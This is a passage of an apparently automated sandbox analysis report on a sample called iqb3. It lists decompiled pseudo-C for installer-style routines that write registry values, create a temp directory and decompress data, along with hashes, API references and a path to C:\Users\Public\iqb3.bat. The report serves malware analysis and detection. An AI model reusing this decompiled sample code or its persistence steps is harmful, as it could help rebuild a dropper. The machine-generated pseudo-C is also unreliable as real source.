                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 090900000BA007700290000008484006C6C00000000DFDF00080000000015007800000000000000ED00848484000020000000000000E0006565000053535353003737000089000000002020000000BCBC000000670000006E00000000000F0000A100004B4B00000000000000CCCCCC00DFDF00767676008F00004B4B000000A9000
                                                                      • API String ID: 0-2221801228
                                                                      • Opcode ID: 051121fa3874d8e8b755ab415ee1dff2938927d782d906638b2643d411ab8d22
                                                                      • Instruction ID: 2ea2e7de70dfcb9b8a6977de9a23dc0afa47d6a26cb5075253e99f3f7356adb1
                                                                      • Opcode Fuzzy Hash: 051121fa3874d8e8b755ab415ee1dff2938927d782d906638b2643d411ab8d22
                                                                      • Instruction Fuzzy Hash: 16816771E04228DBDF24CFA8C8447ADBBB1FB44305F11816AD856BB281D778A996DF44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 100016DA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 762 100016da-10001716 call 10001a86 766 10001827-10001829 762->766 767 1000171c-10001720 762->767 768 10001722-10001728 call 100021ce 767->768 769 10001729-10001736 call 10002218 767->769 768->769 774 10001766-1000176d 769->774 775 10001738-1000173d 769->775 776 1000178d-10001791 774->776 777 1000176f-1000178b call 100023d6 call 10001576 call 10001278 GlobalFree 774->777 778 10001758-1000175b 775->778 779 1000173f-10001740 775->779 780 10001793-100017cd call 10001576 call 100023d6 776->780 781 100017cf-100017d5 call 100023d6 776->781 802 100017d6-100017da 777->802 778->774 782 1000175d-1000175e call 10002abb 778->782 784 10001742-10001743 779->784 785 10001748-10001749 call 10002800 779->785 780->802 781->802 795 10001763 782->795 790 10001750-10001756 call 100025a2 784->790 791 10001745-10001746 784->791 798 1000174e 785->798 801 10001765 790->801 791->774 791->785 795->801 798->795 801->774 805 10001817-1000181e 802->805 806 100017dc-100017ea call 1000239c 802->806 805->766 808 10001820-10001821 GlobalFree 805->808 812 10001802-10001809 806->812 813 100017ec-100017ef 806->813 808->766 812->805 814 1000180b-10001816 call 100014ff 812->814 813->812 815 100017f1-100017f9 813->815 814->805 815->812 817 100017fb-100017fc FreeLibrary 815->817 817->812
                                                                      C-Code - Quality: 89%
                                                                      			E100016DA(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				struct HINSTANCE__* _t34;
				intOrPtr _t38;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t50;
				intOrPtr _t53;
				signed int _t57;
				signed int _t61;
				void* _t65;
				void* _t66;
				void* _t70;
				void* _t74;

				_t74 = __esi;
				_t66 = __edi;
				_t65 = __edx;
				 *0x1000405c = _a8;
				 *0x10004060 = _a16;
				 *0x10004064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004038, E10001573);
				_push(1);
				_t34 = E10001A86();
				_t50 = _t34;
				if(_t50 == 0) {
					L28:
					return _t34;
				} else {
					if( *((intOrPtr*)(_t50 + 4)) != 1) {
						E100021CE(_t50);
					}
					E10002218(_t65, _t50);
					_t53 =  *((intOrPtr*)(_t50 + 4));
					if(_t53 == 0xffffffff) {
						L14:
						if(( *(_t50 + 0x810) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t50 + 4)) == 0) {
								_push(_t50);
								_t34 = E100023D6(_t65);
							} else {
								_push(_t74);
								_push(_t66);
								_t12 = _t50 + 0x818; // 0x818
								_t57 = 8;
								memcpy( &_v36, _t12, _t57 << 2);
								_t38 = E10001576(_t50);
								_t15 = _t50 + 0x818; // 0x818
								_t70 = _t15;
								_push(_t50);
								 *((intOrPtr*)(_t50 + 0x820)) = _t38;
								 *_t70 = 3;
								E100023D6(_t65);
								_t61 = 8;
								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
							}
						} else {
							_push(_t50);
							E100023D6(_t65);
							_t34 = GlobalFree(E10001278(E10001576(_t50)));
						}
						if( *((intOrPtr*)(_t50 + 4)) != 1) {
							_t34 = E1000239C(_t50);
							if(( *(_t50 + 0x810) & 0x00000040) != 0 &&  *_t50 == 1) {
								_t34 =  *(_t50 + 0x808);
								if(_t34 != 0) {
									_t34 = FreeLibrary(_t34);
								}
							}
							if(( *(_t50 + 0x810) & 0x00000020) != 0) {
								_t34 = E100014FF( *0x10004058);
							}
						}
						if(( *(_t50 + 0x810) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t50);
						}
					}
					_t44 =  *_t50;
					if(_t44 == 0) {
						if(_t53 != 1) {
							goto L14;
						}
						E10002ABB(_t50);
						L12:
						_t50 = _t44;
						L13:
						goto L14;
					}
					_t45 = _t44 - 1;
					if(_t45 == 0) {
						L8:
						_t44 = E10002800(_t53, _t50); // executed
						goto L12;
					}
					_t46 = _t45 - 1;
					if(_t46 == 0) {
						E100025A2(_t50);
						goto L13;
					}
					if(_t46 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

















                                                                      0x100016da
                                                                      0x100016da
                                                                      0x100016da
                                                                      0x100016e4
                                                                      0x100016ec
                                                                      0x100016f9
                                                                      0x10001707
                                                                      0x1000170a
                                                                      0x1000170c
                                                                      0x10001711
                                                                      0x10001716
                                                                      0x10001829
                                                                      0x10001829
                                                                      0x1000171c
                                                                      0x10001720
                                                                      0x10001723
                                                                      0x10001728
                                                                      0x1000172a
                                                                      0x10001730
                                                                      0x10001736
                                                                      0x10001766
                                                                      0x1000176d
                                                                      0x10001791
                                                                      0x100017cf
                                                                      0x100017d0
                                                                      0x10001793
                                                                      0x10001793
                                                                      0x10001794
                                                                      0x10001797
                                                                      0x1000179d
                                                                      0x100017a1
                                                                      0x100017a4
                                                                      0x100017a9
                                                                      0x100017a9
                                                                      0x100017af
                                                                      0x100017b0
                                                                      0x100017b6
                                                                      0x100017bc
                                                                      0x100017c8
                                                                      0x100017c9
                                                                      0x100017cc
                                                                      0x1000176f
                                                                      0x1000176f
                                                                      0x10001770
                                                                      0x10001785
                                                                      0x10001785
                                                                      0x100017da
                                                                      0x100017dd
                                                                      0x100017ea
                                                                      0x100017f1
                                                                      0x100017f9
                                                                      0x100017fc
                                                                      0x100017fc
                                                                      0x100017f9
                                                                      0x10001809
                                                                      0x10001811
                                                                      0x10001816
                                                                      0x10001809
                                                                      0x1000181e
                                                                      0x00000000
                                                                      0x10001820
                                                                      0x00000000
                                                                      0x10001821
                                                                      0x1000181e
                                                                      0x1000173a
                                                                      0x1000173d
                                                                      0x1000175b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1000175e
                                                                      0x10001763
                                                                      0x10001763
                                                                      0x10001765
                                                                      0x00000000
                                                                      0x10001765
                                                                      0x1000173f
                                                                      0x10001740
                                                                      0x10001748
                                                                      0x10001749
                                                                      0x00000000
                                                                      0x10001749
                                                                      0x10001742
                                                                      0x10001743
                                                                      0x10001751
                                                                      0x00000000
                                                                      0x10001751
                                                                      0x10001746
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001746

                                                                      APIs
                                                                        • Part of subcall function 10001A86: GlobalFree.KERNEL32 ref: 10001CED
                                                                        • Part of subcall function 10001A86: GlobalFree.KERNEL32 ref: 10001CF2
                                                                        • Part of subcall function 10001A86: GlobalFree.KERNEL32 ref: 10001CF7
                                                                      • GlobalFree.KERNEL32 ref: 10001785
                                                                      • FreeLibrary.KERNEL32(?), ref: 100017FC
                                                                      • GlobalFree.KERNEL32 ref: 10001821
                                                                        • Part of subcall function 100021CE: GlobalAlloc.KERNEL32(00000040,FFFFFF25), ref: 10002200
                                                                        • Part of subcall function 100025A2: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001756,00000000), ref: 10002614
                                                                        • Part of subcall function 10001576: lstrcpyA.KERNEL32(00000000,10004010,00000000,100016B2,00000000), ref: 1000158F
                                                                        • Part of subcall function 100023D6: wsprintfA.USER32 ref: 1000243D
                                                                        • Part of subcall function 100023D6: GlobalFree.KERNEL32 ref: 100024F0
                                                                        • Part of subcall function 100023D6: GlobalFree.KERNEL32 ref: 10002519
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.757682389.0000000010001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000002.00000002.757659819.0000000010000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                      • Associated: 00000002.00000002.757713257.0000000010003000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                      • Associated: 00000002.00000002.757732274.0000000010005000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_10000000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$Alloc$Librarylstrcpywsprintf
                                                                      • String ID:
                                                                      • API String ID: 1767494692-3916222277
                                                                      • Opcode ID: 80c1eb4dc1bb9434ef57333ea610fa1f90e3e1b5418920c54ad1d83e70a562f5
                                                                      • Instruction ID: 934e7617fa40043d42386ee9ca144464bf73cca2219d0ab945a4c64a7ea5d568
                                                                      • Opcode Fuzzy Hash: 80c1eb4dc1bb9434ef57333ea610fa1f90e3e1b5418920c54ad1d83e70a562f5
                                                                      • Instruction Fuzzy Hash: BA31AD758046059AFB41DF649CC6BDA37ECFF052D0F008425F90AAA19EDFB499458BA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040231C Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 90%
                                                                      			E0040231C(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				long _t22;
				char _t24;
				int _t27;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402AF2(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x14));
				 *(_t37 - 0x30) =  *(_t37 - 0x10);
				 *(_t37 - 0x44) = E004029FD(2);
				_t18 = E004029FD(0x11);
				_t31 =  *0x423790 | 0x00000002;
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x423790 | 0x00000002, _t27, _t37 + 8, _t27); // executed
				if(_t19 == 0) {
					if(_t35 == 1) {
						E004029FD(0x23);
						_t19 = lstrlenA(0x409bb0) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029E0(3);
						 *0x409bb0 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402F1F(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x409bb0, 0xc00);
					}
					_t22 = RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x409bb0, _t19); // executed
					if(_t22 == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423768 =  *0x423768 +  *(_t37 - 4);
				return 0;
			}











                                                                      0x0040231d
                                                                      0x00402322
                                                                      0x0040232c
                                                                      0x00402336
                                                                      0x00402339
                                                                      0x00402349
                                                                      0x00402353
                                                                      0x0040235a
                                                                      0x00402362
                                                                      0x00402370
                                                                      0x00402374
                                                                      0x0040237f
                                                                      0x0040237f
                                                                      0x00402383
                                                                      0x00402387
                                                                      0x0040238d
                                                                      0x00402392
                                                                      0x00402392
                                                                      0x00402396
                                                                      0x004023a2
                                                                      0x004023a2
                                                                      0x004023b3
                                                                      0x004023bb
                                                                      0x004023bd
                                                                      0x004023bd
                                                                      0x004023c0
                                                                      0x00402490
                                                                      0x00402490
                                                                      0x00402895
                                                                      0x004028a1

                                                                      APIs
                                                                      • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040235A
                                                                      • lstrlenA.KERNEL32(00409BB0,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040237A
                                                                      • RegSetValueExA.KERNELBASE(?,?,?,?,00409BB0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B3
                                                                      • RegCloseKey.ADVAPI32(?,?,?,00409BB0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateValuelstrlen
                                                                      • String ID:
                                                                      • API String ID: 1356686001-0
                                                                      • Opcode ID: 8fb3e0f7f11e38496f68fef7312eb5468912eb9ef26bee94d7414f60837b7186
                                                                      • Instruction ID: 9c4c752beb0f8e8bc138c26b394c9166cd94382eb1b14f60ad9d974daee8f686
                                                                      • Opcode Fuzzy Hash: 8fb3e0f7f11e38496f68fef7312eb5468912eb9ef26bee94d7414f60837b7186
                                                                      • Instruction Fuzzy Hash: C61172B1E00118BFEB10AFA4DE89EAF7678FB50358F10413AF905B61D1D7B85D01AB68
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 10002800 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 156fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileA.KERNELBASE(00000000), ref: 100028BF
                                                                      • GetLastError.KERNEL32 ref: 100029C6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.757682389.0000000010001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000002.00000002.757659819.0000000010000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                      • Associated: 00000002.00000002.757713257.0000000010003000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                      • Associated: 00000002.00000002.757732274.0000000010005000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_10000000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: CreateErrorFileLast
                                                                      • String ID: @Met
                                                                      • API String ID: 1214770103-2381362037
                                                                      • Opcode ID: 670f03678a5eaf619360d21028c39b4414a5d41f5967bb61c5d6db3b3f09e835
                                                                      • Instruction ID: e4aa2bd3e495effe50d9526cbc68d205f519acfcad6f3d50ccedb804016fbdef
                                                                      • Opcode Fuzzy Hash: 670f03678a5eaf619360d21028c39b4414a5d41f5967bb61c5d6db3b3f09e835
                                                                      • Instruction Fuzzy Hash: 8D5162BA908215DFFB10DFA4DCC675937B4EB443D5F21842AEA08E722DDF34A9808B54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004031E3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 84%
                                                                      			E004031E3(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\";
				E00405F49(_t6);
				_t2 = E004057DB(_t6);
				if(_t2 != 0) {
					E0040576E(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E0040599E("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}






                                                                      0x004031e4
                                                                      0x004031ea
                                                                      0x004031f0
                                                                      0x004031f7
                                                                      0x004031fc
                                                                      0x00403204
                                                                      0x00403210
                                                                      0x00403216
                                                                      0x004031fa
                                                                      0x004031fa
                                                                      0x004031fa

                                                                      APIs
                                                                        • Part of subcall function 00405F49: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\Public\iqb3.bat" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,746AFA90,004033C9), ref: 00405FA1
                                                                        • Part of subcall function 00405F49: CharNextA.USER32(?,?,?,00000000), ref: 00405FAE
                                                                        • Part of subcall function 00405F49: CharNextA.USER32(?,"C:\Users\Public\iqb3.bat" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,746AFA90,004033C9), ref: 00405FB3
                                                                        • Part of subcall function 00405F49: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,746AFA90,004033C9), ref: 00405FC3
                                                                      • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,746AFA90,004033C9), ref: 00403204
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: Char$Next$CreateDirectoryPrev
                                                                      • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 4115351271-3512041753
                                                                      • Opcode ID: f80f4c6bea085b934f07f01a50d8cef12395f9d7bebc9578094670fc86bd733e
                                                                      • Instruction ID: 96047f1703e1a12197270cf5e797561ca5ab02306a5825906e00d3d3d2912a57
                                                                      • Opcode Fuzzy Hash: f80f4c6bea085b934f07f01a50d8cef12395f9d7bebc9578094670fc86bd733e
                                                                      • Instruction Fuzzy Hash: D8D0922160AD30A2D551372A3E0AFCF150C8F46769F118077F808760C24BAC5A8269FE
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004066ED Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 99%
                                                                      			E004066ED() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00406B5B))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
